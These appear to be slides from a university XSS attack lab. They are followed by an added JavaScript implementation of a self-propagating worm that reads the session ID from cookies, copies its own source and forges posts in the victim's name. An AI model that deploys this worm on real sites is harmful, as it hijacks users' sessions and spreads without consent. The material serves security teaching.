Cross-Site Scripting (XSS) Attack Lab
Cross-Site Scripting (XSS) Attack Lab Zutao Zhu 11/10/2009

Outline Basic idea

Basic Idea

Task 1 Run the code

Task 2 Run the code

Task 3 Run the code. Pay attention to the empty space in the cookie: document.cookie separates cookies with "; ", so a space precedes every name after the first. escape() does not delete the space; it URL-encodes it (a space becomes %20), which is enough to keep the value from breaking the request you build from it. escape() is a legacy function; encodeURIComponent() is the current equivalent. http://www.w3schools.com/jsref/jsref_escape.asp

Task 4 Change the sample code to include the cookie in the POST request. The cookie travels in a Cookie request header, not in the form body, so add it with urlConn.addRequestProperty("Cookie", ...) http://java.sun.com/j2se/1.4.2/docs/api/java/net/URLConnection.html Refer to http://java.sun.com/ to learn how to install the JDK

Task 5 Goal: when the victim clicks this post, it automatically creates a post on the victim's behalf. Steps: (1) retrieve the victim's session ID from the cookie using JavaScript; (2) forge an HTTP POST request that posts a message using that session ID.

Task 5 Write an XSS worm: construct the HTTP request; find the sid in the cookie; construct the content to send (the exact format of the content can be obtained from LiveHTTPHeaders by capturing a legitimate post); send it; try to minimize the size of the script.

Task 6 To be able to propagate itself, the forged message must also include the worm, so whenever somebody clicks on the forged message, a new forged message carrying the same worm is created in that person's name. This way the worm propagates.

Task 6 Self-Propagating XSS Worm: make a copy of itself when posting the message; ensure the message posted is URL-encoded.

Strategy: Use the DOM API (for example, read the innerHTML of the script element that holds the worm) to make a copy of itself. Use the JavaScript function encodeURIComponent() for URL encoding. Avoid the '+' symbol for both string concatenation and addition, because form URL encoding uses '+' to denote a space. Use absolute values, avoid number manipulation, and use the concat() function for string concatenation.

Note concat() combines the text of two or more strings and returns a new string: 'a'.concat('b', 'c') is 'abc'.
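The client half of the worm described in Tasks 5 and 6 and the Strategy slide, written as an added example (not the lab's own code) so that it can be run outside a browser and checked. Everything below that is not on the slides is an assumption: the form fields are named sid, subject, message and post; the worm sits in an element with id "worm"; the cookie name and POST path are whatever the captured request shows, and are passed in as parameters.

```javascript
// Added example, not the lab's own code. Field names (sid, subject, message,
// post), the element id "worm", the cookie name and the POST path are
// assumptions; in the lab they come from the request captured with LiveHTTPHeaders.

// Return the value of one cookie from a document.cookie string such as
// "style=1; sessid=abc123". The space after each ';' is trimmed here, which
// is the "empty space in the cookie" that Task 3 warns about.
function getCookie(cookieString, name) {
  var parts = cookieString.split(';');
  for (var i = 0; i < parts.length; i++) {
    var pair = parts[i].replace(/^\s+|\s+$/g, '');
    var eq = pair.indexOf('=');
    if (eq > 0 && pair.substring(0, eq) === name) {
      return pair.substring(eq + 1);
    }
  }
  return null;
}

// Build an application/x-www-form-urlencoded body from [name, value] pairs.
// encodeURIComponent() (not the legacy escape()) is used: it turns '+' into
// %2B, so a '+' inside the worm source is not decoded as a space by the
// server. Strings are joined with concat(), as the Strategy slide recommends.
function formEncode(fields) {
  var body = '';
  for (var i = 0; i < fields.length; i++) {
    var piece = encodeURIComponent(fields[i][0]).concat('=', encodeURIComponent(fields[i][1]));
    body = body === '' ? piece : body.concat('&', piece);
  }
  return body;
}

// Assemble the forged post. The worm copies itself by reading its own source
// back out of the DOM (innerHTML of the element that holds it) and wrapping
// it in a fresh <script> tag. The closing tag is built from two pieces so the
// worm source, once embedded in a page, never contains a literal "</script>"
// that would end the script element early.
function buildWormPost(doc, wormElementId, sidCookieName, postPath) {
  var sid = getCookie(doc.cookie, sidCookieName);
  if (sid === null) {
    return null; // no session to ride on; the server would reject the post
  }
  var holder = doc.getElementById(wormElementId);
  if (holder === null) {
    return null; // worm container not found; nothing to copy
  }
  var copy = '<script id="'.concat(wormElementId, '">', holder.innerHTML, '</scr', 'ipt>');
  var message = 'Check out my post!'.concat(copy);
  return {
    path: postPath,
    body: formEncode([['sid', sid], ['subject', 'Worm'], ['message', message], ['post', 'Submit']])
  };
}

// Send the forged request. In the browser xhr is new XMLHttpRequest(); a stub
// that records the body works for offline checking.
function sendPost(req, xhr) {
  xhr.open('POST', req.path, true);
  xhr.setRequestHeader('Content-Type', 'application/x-www-form-urlencoded');
  xhr.send(req.body);
}

// Decode a form body the way the server does ('+' and %20 both become a
// space) so the round trip can be checked: the posted copy must equal the
// original worm source, otherwise the next generation will not run.
function formDecode(body) {
  var fields = {};
  var parts = body.split('&');
  for (var i = 0; i < parts.length; i++) {
    var eq = parts[i].indexOf('=');
    var rawName = eq < 0 ? parts[i] : parts[i].substring(0, eq);
    var rawValue = eq < 0 ? '' : parts[i].substring(eq + 1);
    fields[decodeURIComponent(rawName.replace(/\+/g, ' '))] =
      decodeURIComponent(rawValue.replace(/\+/g, ' '));
  }
  return fields;
}
```

In a browser the worm body would be `sendPost(buildWormPost(document, 'worm', 'sessid', '/posting.php'), new XMLHttpRequest())`, with the cookie name and path replaced by the ones seen in the captured request. Running formDecode() over the body you build is the quickest way to confirm that the copied script survives encoding byte-for-byte before trying it against the lab server.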